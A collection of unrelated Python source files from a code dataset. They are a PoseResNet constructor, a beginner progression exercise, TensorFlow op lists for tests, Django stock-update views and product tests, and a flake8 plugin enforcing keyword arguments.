upsampling = Upsampling(backbone.out_features, bias=deconv_with_bias)
model = PoseResNet(backbone, upsampling, 256, num_keypoints, finetune)
return model
def pose_resnet101(num_keypoints, pretrained_backbone=True, deconv_with_bias=False, finetune=False, progress=True, **kwargs):
"""Constructs a Simple Baseline model with a ResNet-101 backbone.
Args:
num_keypoints (int): number of keypoints
pretrained_backbone (bool, optional): If True, returns a model pre-trained on ImageNet. Default: True.
deconv_with_bias (bool, optional): Whether use bias in the deconvolution layer. Default: False
finetune (bool, optional): Whether use 10x smaller learning rate in the backbone. Default: False
progress (bool, optional): If True, displays a progress bar of the download to stderr. Default: True
"""
return _pose_resnet('resnet101', num_keypoints, Bottleneck, [3, 4, 23, 3], pretrained_backbone, deconv_with_bias, finetune, progress, **kwargs) | StarcoderdataPython |
3399501 | from time import sleep
termo1 = int(input('Digite o primeiro termo da progressão: '))
razao = int(input('Digite a razão da progressão: '))
decimo = termo1 + (10 - 1) * razao
for c in range(termo1, decimo + razao, razao): #Mostra os dez primeiros termos de uma pa
print(' {} '.format(c), end='=>')
sleep(0.3)
print(' Acabou')
| StarcoderdataPython |
4824749 | <gh_stars>1-10
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""It lists ops of RaggedTensor for the interest of test."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_bitwise_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import special_math_ops
from tensorflow.python.ops import string_ops
# Constants listing various op types to test. Each operation
# should be included in at least one list below, or tested separately if
# necessary (e.g., because it expects additional arguments).
UNARY_FLOAT_OPS = [
math_ops.abs,
math_ops.acos,
math_ops.acosh,
math_ops.angle,
math_ops.asin,
math_ops.asinh,
math_ops.atan,
math_ops.atanh,
math_ops.ceil,
math_ops.conj,
math_ops.cos,
math_ops.cosh,
math_ops.digamma,
math_ops.erf,
math_ops.erfc,
math_ops.erfcinv,
math_ops.erfinv,
math_ops.exp,
math_ops.expm1,
math_ops.floor,
math_ops.imag,
math_ops.is_finite,
math_ops.is_inf,
math_ops.is_nan,
math_ops.lgamma,
math_ops.log,
math_ops.log1p,
math_ops.log_sigmoid,
math_ops.ndtri,
math_ops.negative,
math_ops.real,
math_ops.reciprocal,
math_ops.reciprocal_no_nan,
math_ops.rint,
math_ops.round,
math_ops.rsqrt,
math_ops.sign,
math_ops.sigmoid,
math_ops.sin,
math_ops.sinh,
math_ops.softplus,
math_ops.sqrt,
math_ops.square,
math_ops.tan,
math_ops.tanh,
array_ops.identity,
array_ops.ones_like,
array_ops.zeros_like,
special_math_ops.bessel_i0,
special_math_ops.bessel_i0e,
special_math_ops.bessel_i1,
special_math_ops.bessel_i1e,
]
UNARY_BOOL_OPS = [
math_ops.logical_not,
]
UNARY_STRING_OPS = [
string_ops.decode_base64,
string_ops.encode_base64,
string_ops.string_strip,
parsing_ops.decode_compressed,
]
BINARY_FLOAT_OPS = [
math_ops.add,
math_ops.atan2,
math_ops.complex,
math_ops.div_no_nan,
math_ops.divide,
math_ops.equal,
math_ops.floordiv,
math_ops.floormod,
math_ops.greater,
math_ops.greater_equal,
math_ops.less,
math_ops.less_equal,
math_ops.maximum,
math_ops.minimum,
math_ops.multiply,
math_ops.multiply_no_nan,
math_ops.not_equal,
math_ops.pow,
math_ops.realdiv,
math_ops.squared_difference,
math_ops.subtract,
math_ops.truediv,
]
BINARY_BOOL_OPS = [
math_ops.logical_and,
math_ops.logical_or,
math_ops.logical_xor,
]
UNARY_INT_OPS = [
gen_bitwise_ops.invert,
string_ops.unicode_script,
]
BINARY_INT_OPS = [
gen_bitwise_ops.bitwise_and,
gen_bitwise_ops.bitwise_or,
gen_bitwise_ops.bitwise_xor,
gen_bitwise_ops.left_shift,
gen_bitwise_ops.right_shift,
math_ops.truncatediv,
math_ops.truncatemod,
]
| StarcoderdataPython |
1762172 | from django.shortcuts import render
from django.http import JsonResponse
from . import tasks
import storage.rcache as rcache
# Create your views here.
def update_stock_info(request):
resp_dict = {}
if request.method == 'POST' and request.is_ajax():
resp_dict['status'] = '成功'
tasks.update_stock_basics.delay()
else:
resp_dict['status'] = '失败'
return JsonResponse(resp_dict)
def update_history(request):
resp_dict = {}
if request.method == 'POST' and request.is_ajax():
resp_dict['status'] = '成功'
tasks.update_all_history.delay()
else:
resp_dict['status'] = '失败'
return JsonResponse(resp_dict)
def update_tick_data(request):
resp_dict = {}
if request.method == 'POST' and request.is_ajax():
resp_dict['status'] = '成功'
tasks.update_tick.delay()
else:
resp_dict['status'] = '失败'
return JsonResponse(resp_dict)
def update_fundamental(request):
_updater_handle = {
'report_data': tasks.update_report_data.delay,
'profit_data': tasks.update_profit_data.delay,
'operation_data': tasks.update_operation_data.delay,
'growth_data': tasks.update_growth_data.delay,
'debtpaying_data': tasks.update_debtpaying_data.delay,
'cashflow_data': tasks.update_cashflow_data.delay,
}
_month_to_quarter = {
1:1, 2:1, 3:1,
4:2, 5:2, 6:2,
7:3, 8:3, 9:3,
10:4, 11:4, 12:4,
}
resp_dict = {}
if request.method == 'POST' and request.is_ajax():
db = request.POST.get('db')
year = int(request.POST.get('year'))
month = int(request.POST.get('month'))
quarter = _month_to_quarter[month]
resp_dict['status'] = '成功'
_updater_handle[db](year, quarter)
else:
resp_dict['status'] = '失败'
return JsonResponse(resp_dict)
def update_time(request):
return JsonResponse({
"basic_info": rcache.get_timestamp(rcache.KEY_TS_BASIC_INFO),
"history": rcache.get_timestamp(rcache.KEY_TS_HISTORY),
"tick_data": rcache.get_timestamp(rcache.KEY_TS_TICK_DATA),
"report_data": rcache.get_timestamp(rcache.KEY_TS_REPORT_DATA),
"profit_data": rcache.get_timestamp(rcache.KEY_TS_PROFIT_DATA),
"operation_data": rcache.get_timestamp(rcache.KEY_TS_OPERATION_DATA),
"growth_data": rcache.get_timestamp(rcache.KEY_TS_GROWTH_DATA),
"debtpaying_data": rcache.get_timestamp(rcache.KEY_TS_DEBTPAYING_DATA),
"cashflow_data": rcache.get_timestamp(rcache.KEY_TS_CASHFLOW_DATA),
})
| StarcoderdataPython |
1642428 | from django.test import TestCase, Client
from django.urls import reverse
from django.contrib.auth.models import User
from products.models import Category, Product
class TestProductViews(TestCase):
"test the product views for all users"
def setUp(self):
self.client = Client()
self.user = User.objects.create_user(
username='testuser',
email='<EMAIL>',
password='<PASSWORD>'
)
self.category = Category.objects.create(
name="test_category",
friendly_name="Test Category"
)
self.product = Product.objects.create(
category=self.category,
sku="1",
name="test product",
description="test description",
price="2.99",
rating="4",
image="testimage.jpg",
has_sizes=False,
)
self.products = reverse("products")
self.product_detail = reverse("product_detail",
kwargs={"product_id": self.product.id})
def test_products_view(self):
''' Test the products view '''
response = self.client.get(self.products)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "products/products.html")
self.assertTemplateUsed(response, "base.html")
def test_products_views_with_sort(self):
''' Test the products view with a direction parameter '''
response = self.client.get(self.products,
{"sort": "name",
"direction": "desc"})
context = response.context
self.assertTrue(context['current_sorting'])
self.assertEqual(context['current_sorting'], "name_desc")
def test_view_product_detail_view(self):
''' Test the product_detail view '''
response = self.client.get(self.product_detail)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "products/product_detail.html")
self.assertTemplateUsed(response, "base.html")
| StarcoderdataPython |
3270821 | <reponame>isac322/flake8-force-keyword-arguments
import ast
import importlib
import re
import sys
from argparse import Namespace
from itertools import chain
from typing import ClassVar, Iterable, Tuple, Type
from flake8.options.manager import OptionManager
from marisa_trie import Trie
import flake8_force_keyword_arguments
from flake8_force_keyword_arguments import util
if sys.version_info < (3, 8):
from typing_extensions import Final
else:
from typing import Final
if sys.version_info < (3, 9):
from typing import Pattern
else:
from re import Pattern
DEFAULT_MAX_POS_ARGS: Final[int] = 2
DEFAULT_IGNORE_PATTERNS: Final[str] = (
r'(:?'
r'^logger.(:?log|debug|info|warning|error|exception|critical)$'
r'|__setattr__$'
r'|__delattr__$'
r'|__getattr__$'
r'|^(:?typing\.)?cast$'
r')'
)
DEFAULT_INSPECT_MODULES: Final[Tuple[str, ...]] = ('builtins',)
DEFAULT_QUALIFIER_OPTION: Final[util.QualifierOption] = util.QualifierOption.BOTH
class Checker:
name: Final[str] = flake8_force_keyword_arguments.__name__
version: Final[str] = flake8_force_keyword_arguments.__version__
MESSAGE_TEMPLATE: Final[
str
] = 'FKA100 {function_name}\'s call uses {number_of_args} positional arguments, use keyword arguments.'
_max_pos_args: ClassVar[int] = DEFAULT_MAX_POS_ARGS
_ignore_patterns: ClassVar[Tuple[Pattern[str], ...]] = ()
_ignore_trie: ClassVar[Trie]
_tree: ast.AST
def __init__(self, tree: ast.AST) -> None:
self._tree = tree
@classmethod
def add_options(cls, parser: OptionManager) -> None:
parser.add_option( # pragma: no cover
'--kwargs-max-positional-arguments',
type=int,
dest='max_positional_arguments',
default=DEFAULT_MAX_POS_ARGS,
parse_from_config=True,
help='How many positional arguments are allowed (default: %(default)s)',
)
parser.add_option( # pragma: no cover
'--kwargs-ignore-function-pattern',
type=str,
dest='ignore_function_pattern',
default=DEFAULT_IGNORE_PATTERNS,
parse_from_config=True,
help='Ignore pattern list (default: %(default)s)',
)
parser.add_option( # pragma: no cover
'--kwargs-ignore-function-pattern-extend',
type=str,
dest='ignore_function_pattern_extend',
default=None,
parse_from_config=True,
help='Extend ignore pattern list.',
)
parser.add_option( # pragma: no cover
'--kwargs-inspect-module',
dest='inspect_module',
comma_separated_list=True,
default=DEFAULT_INSPECT_MODULES,
parse_from_config=True,
help=(
'Inspect module level constructor of classes or functions to gather positional only callables '
'and ignore it on lint. Note that methods are not subject to inspection. (default: %(default)s)'
),
)
parser.add_option( # pragma: no cover
'--kwargs-inspect-module-extend',
dest='inspect_module_extend',
comma_separated_list=True,
default=(),
parse_from_config=True,
help='Extend --kwargs-inspect-module',
)
parser.add_option( # pragma: no cover
'--kwargs-inspect-qualifier-option',
type=util.QualifierOption,
dest='inspect_qualifier_option',
choices=tuple(map(lambda v: v.value, util.QualifierOption.__members__.values())),
default=DEFAULT_QUALIFIER_OPTION.value,
parse_from_config=True,
help=(
'For detected positional only callables by inspection, option to append the qualifier or not. '
'e.g. In case builtins.setattr(), '
'`both` will register `builtins.setattr` and `setattr` as positional only function. '
'`only_name` will register `setattr` and `only_with_qualifier` will register `builtins.setattr`. '
'(default: %(default)s)'
),
)
@classmethod
def parse_options(cls, options: Namespace) -> None:
cls._max_pos_args = options.max_positional_arguments
ignore_patterns = (options.ignore_function_pattern, options.ignore_function_pattern_extend)
cls._ignore_patterns = tuple(map(re.compile, filter(None, ignore_patterns)))
qualifier_option = options.inspect_qualifier_option
cls._ignore_trie = Trie(
chain.from_iterable(
map(
lambda module_name: util.list_pos_only_callables(
m=importlib.import_module(module_name),
parent_module_qualifier=module_name,
poa_threshold=cls._max_pos_args,
qualifier_option=qualifier_option,
),
chain(options.inspect_module, options.inspect_module_extend),
)
)
)
def run(self) -> Iterable[Tuple[int, int, str, Type['Checker']]]:
for node in ast.walk(self._tree):
if not isinstance(node, ast.Call) or len(node.args) < self._max_pos_args:
continue
invocation_line = util.get_invocation_line(node)
# ignored because of patterns
if any(map(lambda p: p.search(invocation_line), self._ignore_patterns)):
continue
# ignored because of inspection
if invocation_line in self._ignore_trie:
continue
message = self.MESSAGE_TEMPLATE.format(function_name=invocation_line, number_of_args=len(node.args))
yield node.lineno, node.col_offset, message, type(self)
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.